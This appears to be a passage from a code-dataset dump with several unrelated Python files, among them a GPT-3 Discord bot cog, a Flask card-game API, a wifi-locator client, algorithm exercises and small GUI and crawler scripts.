If you like this bot, please consider donating via \"\n \" BTC address: 14ozvJYfChmiXwqhfzH4yCqcYR7gzwfVYT\")\n\n @commands.command()\n @commands.guild_only()\n async def config(self, ctx):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n owner_id, vips, _, length, allowance = self.__db.get_server_settings(guild_id)\n if user_id != owner_id:\n raise NotAdminError\n length_str = \"# Length: {}\\n\".format(length)\n allowance_str = \"# Allowance: {}\\n\".format(allowance)\n vips_str = \"\"\"# Vips\\n\"\"\"\n for i in range(len(vips)):\n vips_str += \"{} - {}\\n\".format(i + 1, vips[i])\n vips_str += \"Note: Owners are automatically assigned a vip role.\"\n return await ctx.send(length_str + allowance_str + vips_str)\n\n @commands.command()\n @commands.guild_only()\n async def allowance(self, ctx, allowance: int):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n owner_id, vips, _, length, old_allowance = self.__db.get_server_settings(guild_id)\n if user_id != owner_id:\n raise NotAdminError\n self.__db.update_server_allowance(guild_id, allowance)\n return await ctx.send(\"Successfully updated member allowance to {}\".format(allowance))\n\n @commands.command()\n @commands.guild_only()\n async def length(self, ctx, length: int):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n owner_id, vips, _, old_length, allowance = self.__db.get_server_settings(guild_id)\n if user_id != owner_id:\n raise NotAdminError\n self.__db.update_server_length(guild_id, length)\n return await ctx.send(\"Successfully updated response length to {}\".format(length))\n\n @commands.command()\n @commands.guild_only()\n async def vip(self, ctx, *, member: discord.Member):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n owner_id, vips, _, length, allowance = self.__db.get_server_settings(guild_id)\n if user_id != owner_id:\n raise NotAdminError\n member_id, member_name = member.id, member.display_name\n self.__db.add_vip(guild_id, member_id)\n return await ctx.send(\"Successfully added {} to vips.\".format(member_name))\n\n @commands.command()\n @commands.guild_only()\n async def remove_vip(self, ctx, *, member: discord.Member):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n owner_id, vips, _, length, allowance = self.__db.get_server_settings(guild_id)\n if user_id != owner_id:\n raise NotAdminError\n member_id, member_name = member.id, member.display_name\n self.__db.remove_vip(guild_id, member_id)\n return await ctx.send(\"Successfully removed {} from vips.\".format(member_name))\n\n @commands.command()\n @commands.guild_only()\n async def credit(self, ctx):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n today_usage, _, _ = self.__db.get_user_settings(guild_id, user_id)\n _, _, _, _, allowance = self.__db.get_server_settings(guild_id)\n return await ctx.send(\"{}, your remaining daily allowance is: {}.\".format(user_name, allowance - today_usage))\n\n @commands.command()\n @commands.guild_only()\n async def settings(self, ctx):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n _, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n return await ctx.send(\n \"{}, your language is set to: {} and temperature is set to: {}\".format(user_name, language, temperature))\n\n @commands.command()\n @commands.guild_only()\n async def language(self, ctx, lang: str):\n user_id, user_name = user_parse(ctx)\n guild_id = ctx.guild.id\n possible_languages = list(language_map.keys())\n if lang 
not in possible_languages:\n            return await ctx.send(\"{}, chosen language must be one of: {}\".format(user_name, possible_languages))\n        today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n        self.__db.update_user_language(guild_id, user_id, lang)\n        return await ctx.send(\n            \"Successfully updated your settings, {}. Old language: {}, New language: {}\".format(user_name, language,\n                                                                                               lang))\n\n    @commands.command()\n    @commands.guild_only()\n    async def temperature(self, ctx, temp: float):\n        user_id, user_name = user_parse(ctx)\n        guild_id = ctx.guild.id\n        if not 0 <= temp <= 1:\n            return await ctx.send(\"{}, chosen temperature must be between 0 and 1, inclusive. (e.g. 0.3) \"\n                                  \"You can read more about temperature on \"\n                                  \"https://towardsdatascience.com/how-to-sample-from-language-models-682bceb97277 or \"\n                                  \"https://beta.openai.com/docs/api-reference/create-completion-via-get.\".format(\n                user_name))\n        today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n        self.__db.update_user_temperature(guild_id, user_id, temp)\n        return await ctx.send(\n            \"Successfully updated your settings, {}. Old temperature: {}, New temperature: {}\".format(user_name,\n                                                                                                      temperature,\n                                                                                                      temp))\n\n    @commands.command()\n    @commands.guild_only()\n    @check_setup\n    async def answer(self, ctx, *prompt: str):\n        usage = len(list(\"\".join(prompt)))\n        if usage == 0:\n            raise EmptyPromptError\n        user_id, user_name = user_parse(ctx)\n        guild_id = ctx.guild.id\n        today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n        owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n        if usage + today_usage > allowance and user_id not in vips:\n            raise CreditExhaustedError\n        answer = await self.__api.answer(prompt, length=length, api_key=token, language=language,\n                                         temperature=temperature)\n        self.__db.increment_member_usage(guild_id, user_id, usage)\n        return await ctx.send(discord.utils.escape_mentions(answer))\n\n    @commands.command()\n    @commands.guild_only()\n    @check_setup\n    async def complete(self, ctx, *prompt: str):\n        usage = len(list(\"\".join(prompt)))\n        if usage == 0:\n            raise EmptyPromptError\n        user_id, user_name = user_parse(ctx)\n        guild_id = ctx.guild.id\n        today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n        owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n        if usage + today_usage > allowance and user_id not in vips:\n            raise CreditExhaustedError\n        answer = await self.__api.complete(prompt, length=length, api_key=token, language=language,\n                                           temperature=temperature)\n        self.__db.increment_member_usage(guild_id, user_id, usage)\n        return await ctx.send(discord.utils.escape_mentions(answer))\n\n    @commands.command()\n    @commands.guild_only()\n    @check_setup\n    async def song(self, ctx, *prompt: str):\n        usage = len(list(\"\".join(prompt)))\n        if usage == 0:\n            raise EmptyPromptError\n        user_id, user_name = user_parse(ctx)\n        guild_id = ctx.guild.id\n        today_usage, language, temperature = self.__db.get_user_settings(guild_id, user_id)\n        owner_id, vips, token, length, allowance = self.__db.get_server_settings(guild_id)\n        if usage + today_usage > allowance and user_id not in vips:\n            raise CreditExhaustedError\n        answer = await self.__api.song(song_name=prompt, user_name=user_name, length=length, api_key=token,\n                                       language=language,\n                                       temperature=temperature)\n        self.__db.increment_member_usage(guild_id, user_id, usage)\n        return await 
not in vips:\n raise CreditExhaustedError\n answer = await self.__api.headline(prompt, length=length, api_key=token, language=language,\n temperature=temperature)\n self.__db.increment_member_usage(guild_id, user_id, usage)\n return await ctx.send(discord.utils.escape_mentions(answer))\n","repo_name":"e4c6/DiscordGPT-3","sub_path":"Cogs/Maincog.py","file_name":"Maincog.py","file_ext":"py","file_size_in_byte":20616,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"67"} +{"seq_id":"19549670914","text":"import json\nimport boto3\nimport os\nimport sys\nimport logging\nimport logging.config\nimport decimal\nimport kuloko_handler.handler.api_handler as api\n\ndef lambda_handler(event, context):\n try:\n\n session = boto3.session.Session()\n table = boto3.resource('dynamodb', endpoint_url = \"http://dynamodb:8000\").Table('Quote')\n\n sym = 'BTC'\n depth=5\n \n orderbook = api.Orderbook(sym)\n orderbook.depth =depth\n json_orderbook = orderbook.fetch(return_type='json')\n json_orderbook['sym'] = sym\n\n item = json.loads(str(json_orderbook), parse_float=decimal.Decimal)\n table.put_item(\n Item=item\n )\n \n return {\n 'statusCode': 200,\n 'body': json.dumps({\n 'message': 'DONE!'\n }),\n }\n\n except Exception as e:\n logger.exception(e)\n return {\n 'statusCode': 500,\n 'body': json.dumps({\n 'error_message': str(e)\n }),\n }\n\n","repo_name":"tanico-rikudo/kuloko","sub_path":"aws/feed_handler/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28006907173","text":"'''\n단지번호붙이기\nhttps://www.acmicpc.net/problem/2667\n그래프 이론, 그래프 탐색, 깊이 우선 탐색, 넓이 우선 탐색\n'''\n\n\nimport sys\n\ninput = sys.stdin.readline\n\ndic = {0:[1, 0], 1:[-1, 0], 2:[0, 1], 3:[0, -1]}\n\ndef dfs(x, y):\n result = 1\n for i in range(4):\n nx = x + dic[i][0]\n ny = y + dic[i][1]\n if 0 <= nx < N and 0 <= ny < N:\n if graph[nx][ny] == 1:\n graph[nx][ny] = -1\n result += dfs(nx, ny)\n return result\n\nN = int(input())\ngraph = [[0] * N for _ in range(N)]\n\nfor i in range(N):\n row = input()\n for j in range(N):\n graph[i][j] = int(row[j])\n\nanswer = []\nfor i in range(N):\n for j in range(N):\n if graph[i][j] == 1:\n graph[i][j] = -1\n answer.append(dfs(i, j))\n\nanswer.sort()\nprint(len(answer))\nprint('\\n'.join(map(str, answer)))\n","repo_name":"JooJaeHwan/Baekjoon","sub_path":"Silver/2667.py","file_name":"2667.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30067732172","text":"# Copyright (c) Quectel Wireless Solution, Co., Ltd.All Rights Reserved.\r\n# \r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n# \r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n# \r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\nimport usocket as socket\r\nimport log\r\nimport net\r\nimport dataCall\r\nimport __wifiLocator\r\n\r\nclass wifilocator:\r\n\r\n def __init__(self, token=None):\r\n self.wifitoken = token\r\n\r\n def 
getwifilocator(self):\r\n net_sta = net.getState()\r\n if net_sta != -1 and ((net_sta[1][0] == 1) or (net_sta[1][0] == 5)):\r\n call_state = dataCall.getInfo(1, 0)\r\n if (call_state != -1) and (call_state[2][0] == 1):\r\n if len(self.wifitoken) != 16:\r\n return -2\r\n try:\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sockaddr = socket.getaddrinfo('www.queclocator.com', 80)[0][-1]\r\n sock.connect(sockaddr)\r\n cellinfo = __wifiLocator.getWifilocreq(self.wifitoken)\r\n senddata = b\"POST /location/QLOC HTTP/1.0\\r\\nHost: www.queclocator.com\\r\\nContent-Length: {}\\r\\nContent-Type: 05\\r\\nAccept-Charset: utf-8\\r\\n\\r\\n{}\".format(cellinfo[0], cellinfo[1])\r\n sock.write(senddata)\r\n l = sock.readline()\r\n try:\r\n l = l.split(None, 2)\r\n status = int(l[1])\r\n except:\r\n raise ValueError(\"Connect FAIL!\")\r\n reason = \"\"\r\n if status == 200:\r\n while True:\r\n l = sock.readline()\r\n j = l.decode().split(\":\")\r\n if not l or l == b\"\\r\\n\":\r\n break\r\n data = sock.recv(1024)\r\n return __wifiLocator.encodeWifilocreq(data)\r\n else:\r\n if len(l) > 2:\r\n reason = l[2].rstrip()\r\n raise ValueError(\"error info:===='{}'====\".format(reason))\r\n except Exception as e:\r\n print(\"Wifi locator Get the coordinate error:%s \"%str(e))\r\n return -3\r\n else:\r\n return -1\r\n else:\r\n return -1\r\n\r\n\r\n","repo_name":"QuecPython/microPython","sub_path":"ports/quectel/core/wifilocator.py","file_name":"wifilocator.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71741377814","text":"T = int(input())\n\nfor test_case in range(1, T + 1):\n n, m = map(int, input().split())\n board = [[0 for _ in range(n + 1)]]\n for _ in range(n):\n board.append([0] + list(map(int, input().split())))\n res = 0\n for i in range(1, n + 1):\n for j in range(1, n + 1):\n board[i][j] = board[i-1][j] + board[i][j]\n\n for i in range(1, n - m + 2):\n for j in range(1, n - m + 2):\n res = max(res, sum(board[i + m - 1][j: j + m]) - sum(board[i - 1][j: j + m]))\n\n print(f'#{test_case} {res}')","repo_name":"devyuseon/problem-solving","sub_path":"SWEA/2001.py","file_name":"2001.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33114033506","text":"import numpy as np\n\n# The simulation will require most of the functions you have already\n# implemented above. 
If it helps you debug, feel free to copy and\n# paste the code here.\ndef my_distance(drij):\n \"\"\"\n Compute length of displacement vector drij\n assume drij already accounts for PBC\n\n Args:\n drij (np.array) : vector(s) of length 3\n Returns:\n float: length (distance) of vector(s)\n \"\"\"\n return np.linalg.norm(drij, axis=0)\n\n\ndef my_disp_in_box(drij, lbox):\n \"\"\"\n Impose minimum image condition on displacement vector drij=ri-rj\n\n Args:\n drij (np.array): length-3 displacement vector ri-rj\n lbox (float): length of cubic cell\n Returns:\n np.array: drij under MIC\n \"\"\"\n\n return drij - lbox * np.round(drij / lbox)\n\n\ndef my_pos_in_box(pos, lbox):\n \"\"\" wrap positions inside simulation box\n\n Args:\n pos (np.array): positions, shape (natom, ndim)\n lbox (float): box side length\n Returns:\n np.array: pos in box\n \"\"\"\n\n return -lbox / 2 + (pos - lbox / 2) % lbox\n\n\ndef my_kinetic_energy(vel, mass):\n \"\"\" Calculate total kinetic energy.\n\n Args:\n vel (np.array): particle velocities, shape (natom, ndim)\n mass (float): particle mass\n Return:\n float: total kinetic energy\n \"\"\"\n k = 0.0\n for i in vel:\n k += sum(0.5 * mass * i ** 2)\n\n return k\n\n\ndef my_potential_energy(rij, rc):\n \"\"\" Calculate total potential energy.\n\n Args:\n rij (np.array): distance table, shape (natom, natom)\n Return:\n float: total potential energy\n \"\"\"\n vshift = 4 * rc ** (-6) * (rc ** (-6) - 1)\n potential = 0.0\n for i in range(len(rij)):\n for j in range(i + 1, len(rij[0])):\n r = rij[i][j]\n if r <= rc:\n potential += 4 * r ** (-6) * (r ** (-6) - 1) - vshift\n\n return potential\n\n\ndef my_force_on(parameters):\n \"\"\"\n Compute force on atom i\n\n Args:\n i (int): particle index\n pos (np.array) : particle positions, shape (natom, ndim)\n lbox (float): side length of cubic box\n Returns:\n np.array: force on atom i, a length-3 vector\n \"\"\"\n i, pos, lbox, rc = parameters\n Force = np.zeros(3)\n cur = pos[i]\n for atom in pos:\n if (atom == cur).all():\n continue\n r_ij = my_disp_in_box(cur - atom, lbox)\n r = my_distance(r_ij)\n if r <= rc:\n Force += 24 * r ** (-8) * (2 * r ** (-6) - 1) * r_ij\n return Force\n\n\ndef get_distance_table(N, rij):\n drij = np.zeros((N, N))\n for i in range(N):\n for j in range(i + 1, N):\n disp = rij[(i,j)]\n distance = my_distance(disp)\n drij[i][j] = distance\n drij[j][i] = distance\n return drij\n\ndef get_displacement_table(N, R, lbox):\n rij = np.zeros((N, N, 3))\n for i in range(N):\n for j in range(i + 1, N):\n disp = my_disp_in_box(R[i] - R[j], lbox)\n rij[i][j] = disp\n rij[j][i] = disp\n return rij\n\ndef my_temperature(k,N):\n \"\"\" Calculate system temperature.\n\n Args:\n Ek (float): kinetic energy\n atoms (integer): number of atoms\n Return:\n float: temperature\n \"\"\"\n return k/(3*N/2)\n\ndef my_pressure(V,N,T,R,F):\n viral = np.sum([np.dot(R[i],F[i]) for i in range(N)])\n return (N*T + viral/3) / V\n\n","repo_name":"navining/metadynamics","sub_path":"properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"3302487715","text":"from keras.applications.resnet50 import preprocess_input \nfrom keras.applications import ResNet50\nfrom keras.preprocessing.image import img_to_array\nfrom keras.applications import imagenet_utils\nimport numpy as np\nimport cv2\n\n#daha once yazdigimiz kodlari import ediyoruz\nfrom sliding_window_2 import sliding_window\nfrom image_pyramid 
import image_pyramid\nfrom non_max_supression_3 import non_max_suppression\n\nWIDTH = 600\nHEIGHT = 600\nPYR_SCALE = 1.5 # image pyramid scale\nWIN_STEP = 16 # sliding step size\nROI_SIZE = (200,150)\nINPUT_SIZE = (224, 224) ## input size of the crops we will feed into ResNet\n# constant parameters, written in uppercase because they never change\n\nprint(\"Loading ResNet\")\nmodel = ResNet50(weights = \"imagenet\", include_top = True)\n\n\n# the image we will run object detection on\noriginal = cv2.imread(\"husky.jpg\")\noriginal = cv2.resize(original, dsize=(WIDTH, HEIGHT))\n# first we feed the 600x600 image into our own functions; only at the very end\n# do we feed 224x224 crops into ResNet\ncv2.imshow(\"Husky\", original)\n\n(H, W) = original.shape[:2]\n\n# image pyramid\npyramid = image_pyramid(original, PYR_SCALE, ROI_SIZE) # In each iteration, we will run a sliding window.\n\nrois = []\nlocs = []\n\nfor image in pyramid:\n\n    # image_pyramid applies PYR_SCALE, so we must apply it to the scale as well, otherwise the coordinates drift\n    scale = W/float(image.shape[1])\n    \n    # slide by WIN_STEP pixels\n    for (x, y, roiOrig) in sliding_window(image, WIN_STEP, ROI_SIZE):\n        x = int(x*scale)\n        y = int(y*scale)\n        w = int(ROI_SIZE[0]*scale)\n        h = int(ROI_SIZE[1]*scale)\n\n        # roiOrig is needed for classification, so resize it\n        roi = cv2.resize(roiOrig, INPUT_SIZE)\n        roi = img_to_array(roi)\n        # preprocess_input makes it ready for ResNet\n        roi = preprocess_input(roi)\n\n        # append the roi to rois\n        rois.append(roi)\n        locs.append((x,y,x+w,y+h))\n\nrois = np.array(rois, dtype=\"float32\")\n\nprint(\"classification\")\n\npreds = model.predict(rois)\n\npreds = imagenet_utils.decode_predictions(preds, top=1)\n\nlabels = {}\n# only predictions above this value will be processed\nmin_conf = 0.9 # 0.95, 0.8\n\nfor (i, p) in enumerate(preds):\n\n    # each prediction returns 3 values: 1. imageNet_id, 2. label (class)\n    # 3. the prediction probability.\n    (_, label, prob) = p[0]\n\n    # if prob is greater than min_conf\n    if prob >= min_conf:\n        # in short, we only keep predictions above min_conf\n\n        box = locs[i]\n        # box and probability\n        L = labels.get(label, [])\n        L.append((box, prob))\n        labels[label] = L\n\n# filtering and visualization\nfor label in labels.keys():\n    # take a copy so we don't damage the original image\n    clone = original.copy()\n\n    # draw the boxes\n    for (box, prob) in labels[label]:\n        # unpack the box\n        (startX, starY, endX, endY) = box\n        # draw on the copy: green, thickness 2\n        cv2.rectangle(clone, (startX, starY), (endX, endY), (0,255,0), 2)\n        # show it\n        cv2.imshow(\"ilk\", clone)\n\n\n    clone = original.copy()\n\n    # split the label entries for non-maxima suppression (into boxes and probabilities)\n    boxes = np.array([p[0] for p in labels[label]])\n    proba = np.array([p[1] for p in labels[label]])\n\n    # keep the boxes with the highest probability\n    boxes = non_max_suppression(boxes, proba)\n\n    # then draw them\n    for (startX, starY, endX, endY) in boxes:\n        cv2.rectangle(clone, (startX, starY), (endX, endY), (0,255,0), 2)\n        y = starY - 10 if starY - 10 > 10 else starY + 10\n        cv2.putText(clone, label, (startX, y), cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0,255,0), 2)\n    \n    cv2.imshow(\"max bulunan olasilikli eskimo_dog\",clone)\n\nk = cv2.waitKey(0) & 0xFF # -> read the esc key\n\nif k == 27: # quit on esc\n    cv2.destroyAllWindows()\n    \n    \n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"umutcnn/derin_ogrenme_keras","sub_path":"7_evrisimsel_sinir_aglari/6_rcnn1.py","file_name":"6_rcnn1.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"8383475388","text":"class Item:\n    \"\"\"\n    Node of FP-tree\n    \"\"\"\n    def __init__(self,id):\n        self.id = id\n        self.count = 1\n        self.children = []\n        self.father = None\n\n    def get_id(self):\n        return self.id\n\n    def get_count(self):\n        return self.count\n\n    def get_children(self):\n        return self.children\n\n    def get_father(self):\n        return self.father\n\n    def contain_child(self,item_id):\n        for child in self.children:\n            if child.id == item_id:\n                return True\n        return False\n\n    def get_child(self,item_id):\n        for child in self.children:\n            if child.id == item_id:\n                return child\n        return None\n\n    def add_node(self,item_id):\n        child = Item(item_id)\n        child.father = self\n        self.children.append(child)\n\n    def __str__(self):\n        return (\"id: \"+ self.id +\n                \"\\ncount: \" + str(self.count))\n\nclass ItemTree(Item):\n    \"\"\"\n    Root of FP-tree\n    \"\"\"\n    def __init__(self):\n        self.id = 'root'\n        self.count = 0\n        self.children = []\n        self.father = None\n        self.item_trace = {}\n\n    def add_path(self,path):\n        \"\"\" Add a pattern to fp_tree\n\n        :param path: A list, list[0] is the repeat time of this pattern\n        :return: None\n        \"\"\"\n        current_node = self\n        for item_index in range(1,len(path)):\n        #for item_id in path:\n            if current_node.contain_child(path[item_index]):\n                current_node = current_node.get_child(path[item_index])\n                current_node.count += path[0]\n            else:\n                current_node.add_node(path[item_index])\n                current_node = current_node.get_child(path[item_index])\n                current_node.count = path[0]\n            if current_node.id not in self.item_trace: # create the trace list of each item\n                self.item_trace[current_node.id] = []\n                self.item_trace[current_node.id].append(current_node)\n            else:\n                self.item_trace[current_node.id].append(current_node)\n\n    def has_no_branch(self):\n        cur_node = self\n        while cur_node.children:\n            if 
len(cur_node.children)>1:\n return False\n cur_node = cur_node.children[0]\n return True\n","repo_name":"FLAYhhh/DataMining","sub_path":"FP-growth/fptree_structure.py","file_name":"fptree_structure.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38760475381","text":"import json\n\nfrom flask import Blueprint, jsonify, request, render_template, session\nfrom models import User, Game, GameUser, GameCards, user_to_dto, game_to_dto\nfrom app import db\nfrom flask_login import login_user, logout_user, current_user, login_required\n\napi = Blueprint('api', __name__)\n\n\n@api.route('/authenticate', methods=['POST'])\ndef authenticate():\n username = request.json['username']\n if current_user.is_authenticated:\n user = User.query.get(current_user.id)\n if user:\n if username != \"\":\n user.username = username\n else:\n user.username = \"Unknown\"\n db.session.commit()\n return jsonify(user_to_dto(user))\n if username != \"\":\n user = User(username=username)\n else:\n user = User()\n db.session.add(user)\n db.session.commit()\n login_user(user)\n return jsonify(user_to_dto(user))\n\n\n@api.route('/current', methods=['GET'])\ndef get_user():\n if current_user.is_authenticated:\n return jsonify(user_to_dto(current_user))\n return jsonify(\"NotAuthenticated\")\n\n\n@api.route('/logout')\ndef logout():\n # if current_user.is_authenticated:\n # user = User.query.get(current_user.id)\n # if user:\n # db.session.delete(user)\n # db.session.commit()\n logout_user()\n return jsonify(\"LoggedOut\")\n\n\n@api.route('/create')\n@login_required\ndef create():\n game = Game(admin_id=current_user.id)\n db.session.add(game)\n db.session.commit()\n game_user = GameUser(user_id=current_user.id, game_id=game.id)\n db.session.add(game_user)\n db.session.commit()\n session['game_id'] = game.id\n session.permanent = False\n session.modified = True\n return jsonify(game_to_dto(game))\n\n\n@api.route('/game')\ndef get_game():\n if 'game_id' in session.keys():\n if current_user.is_authenticated:\n game = Game.query.get(session['game_id'])\n if game:\n return jsonify(game_to_dto(game))\n session.pop('game_id')\n return jsonify(\"GameNotFound\")\n\n\n@api.route('/start')\n@login_required\ndef start_game():\n if 'game_id' in session.keys():\n game = Game.query.get(session['game_id'])\n if game and game.admin_id == current_user.id:\n game.is_started = True\n db.session.commit()\n return jsonify(game_to_dto(game))\n return jsonify(\"NoPermission\")\n return jsonify(\"GameNotFound\")\n\n\n\n@api.route('/cancel')\ndef cancel_game():\n if 'game_id' in session.keys():\n game_user = GameUser.query.filter_by(user_id=current_user.id, game_id=session['game_id']).first()\n if game_user is not None:\n db.session.delete(game_user)\n db.session.commit()\n session.pop('game_id')\n return jsonify(\"GameCanceled\")\n\n\n@api.route('/join', methods=[\"POST\"])\n@login_required\ndef join_game():\n game_id = request.json['id']\n game = Game.query.get(game_id)\n if game:\n session['game_id'] = game_id\n session.permanent = False\n session.modified = True\n if GameUser.query.filter_by(user_id=current_user.id, game_id=game_id).first() is None:\n game_user = GameUser(user_id=current_user.id, game_id=game_id)\n db.session.add(game_user)\n db.session.commit()\n return jsonify(game_to_dto(game))\n return jsonify(\"GameNotFound\")\n\n\n@api.route('/members')\n@login_required\ndef get_members():\n if 'game_id' in session.keys():\n members = 
GameUser.query.filter_by(game_id=session['game_id']).all()\n members_names = []\n for member in members:\n user = User.query.get(member.user_id);\n members_names.append(user.username)\n return json.dumps(members_names)\n return jsonify(\"GameNotFound\")\n\n\n@api.route('/cards')\n@login_required\ndef get_cards():\n if 'game_id' in session.keys():\n cards = GameCards.query.filter_by(game_id=session['game_id']).all()\n cards_list = []\n for card in cards:\n cards_list.append({\n \"id\": card.card_id,\n \"sprint\": card.sprint_id,\n \"is_grabbed\": card.is_grabbed,\n \"user_id\": card.user_id\n })\n return json.dumps(cards_list)\n return jsonify(\"GameNotFound\")\n\n\n@api.route('/grabbed', methods=['POST'])\n@login_required\ndef card_grabbed():\n print(request.json)\n if 'game_id' in session.keys():\n card_id = request.json['id']\n card = GameCards.query.filter_by(game_id=session['game_id'], card_id=card_id).first()\n if card:\n card.is_grabbed = True\n card.user_id = current_user.id\n else:\n card = GameCards(game_id=session['game_id'], card_id=card_id, is_grabbed=True, user_id=current_user.id)\n db.session.add(card)\n db.session.commit()\n return jsonify(\"Done\")\n return jsonify('GameNotFound')\n\n\n@api.route('/dropped', methods=['POST'])\n@login_required\ndef card_dropped():\n print(request.json)\n if 'game_id' in session.keys():\n card_id = request.json['id']\n sprint_id = request.json['sprint_id']\n\n card = GameCards.query.filter_by(game_id=session['game_id'], card_id=card_id).first()\n if card:\n card.is_grabbed = False\n card.sprint_id = sprint_id\n card.user_id = None\n else:\n card = GameCards(game_id=session['game_id'], card_id=card_id, sprint_id=sprint_id)\n db.session.add(card)\n db.session.commit()\n return jsonify(\"Done\")\n\n return jsonify('GameNotFound')\n\n\n@api.route(\"/\")\ndef my_index():\n return render_template(\"index.html\")\n","repo_name":"NodirBobiev/safe-summer","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20611346515","text":"#coding=utf-8\nimport os\nimport tkinter as tk\nimport tkinter.filedialog as fd\nimport tkinter.messagebox as mb\nfrom tkinter import LEFT\n\n\nclass SavePath():\n def __init__(self, root, path_save):\n self.entry_path = tk.Entry(\n root,\n width=100,\n font=\"13\",\n )\n self.path_to_save = path_save\n\n self.entry_path.insert(0, self.path_to_save)\n\n self.btn_paste_1db = tk.Button(\n root,\n text='Выберите путь',\n fg='black',\n padx=\"14\", pady=\"7\", font=\"13\",\n\n highlightbackground='#66a5ad',\n activeforeground='green',\n activebackground='yellow',\n command=self.choose_directory1,\n )\n\n # self.btn_choose.grid(rowspan=1, columnspan=1)\n # self.btn_get.grid(rowspan=1, columnspan=1)\n\n self.List_for_paste_data = [\n self.entry_path,\n self.btn_paste_1db\n ]\n\n def rendre_save_path(self):\n self.btn_paste_1db.pack(expand=1, side=LEFT)\n self.entry_path.pack(expand=2, side=LEFT)\n\n # self.btn_paste_1db.grid(row=1, rowspan=1, columnspan=1)\n # self.btn_paste_2db.grid(rowspan=1, columnspan=1)\n\n def update_save_path(self):\n self.delete_save_path()\n self.rendre_save_path()\n\n def delete_save_path(self):\n for i in self.List_for_paste_data:\n i.pack_forget()\n\n def choose_directory1(self):\n\n directory = fd.askdirectory(title=\"Выбрать папку\", initialdir=self.path_to_save)\n if os.path.exists(directory):\n self.path_to_save = directory\n self.entry_path.delete(0, \"end\")\n 
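# show the newly chosen directory in the entry field\n            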
self.entry_path.insert(0, self.path_to_save)\n return self.path_to_save\n else:\n mb.showwarning(\"Ошибка выбрана не сущестуюшая папка \", directory)\n","repo_name":"AnyashaTk/Data_anomalies","sub_path":"gui/save_path.py","file_name":"save_path.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7358410680","text":"import os\nos.chdir('c:/users/rodrigo/desktop/crawlToTheFuture/crawl-to-the-future/crawlers/Way-Back/')\n\nimport waybacktrack\n\nsites = ['thenation.com']\nyears = [2000,2005]\n\nfor site in sites:\n for year in years:\n waybacktrack.archive_domain(domain=site,\n year=year,\n debug=True)\n\n\ntry:\n from cStringIO import StringIO as BytesIO\nexcept ImportError:\n from io import BytesIO\n\nfrom eatiht import etv2\n\nos.chdir('../../www.nytimes.com/content/')\n\nfiles = [f for f in os.listdir('.') if os.path.isfile(f)]\n\nfor f in files:\n try:\n content = etv2.extract(f).get_text()\n\n with open(f + '.txt', 'wb') as fi:\n fi.write(BytesIO(content).read())\n except Exception:\n pass\n","repo_name":"rodricios/crawl-to-the-future","sub_path":"dataset/crawl_extract.py","file_name":"crawl_extract.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"67"} +{"seq_id":"18570112724","text":"\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport sys\nimport res\nimport requests\nimport os\n# from network import Network\n# from ..network.network import Network\ncurrent = os.path.dirname(os.path.realpath(__file__))\nparent = os.path.dirname(current)\nsys.path.append(parent)\n\n\nfrom network.network import Network\n\nimport functools\nfrom PyQt5.QtWidgets import QMainWindow\n\n# from product import icons\n\n# from product.product import Main\n\n# statusOfPostLogin =None\nfrom PyQt5.QtWidgets import QWidget\n# from PyQt5.QtGui import *\n# from PyQt5.QtCore import *\n# class Ui_Form(object):\nclass Ui_Form(QMainWindow):\n# class Ui_Form(QWidget):\n def __init__(self):\n super().__init__()\n # w = QtWidgets.QMainWindow()\n # ex.setupUi(w)\n # w.show()\n self.setupUi(self)\n # # # showing all the widgets\n 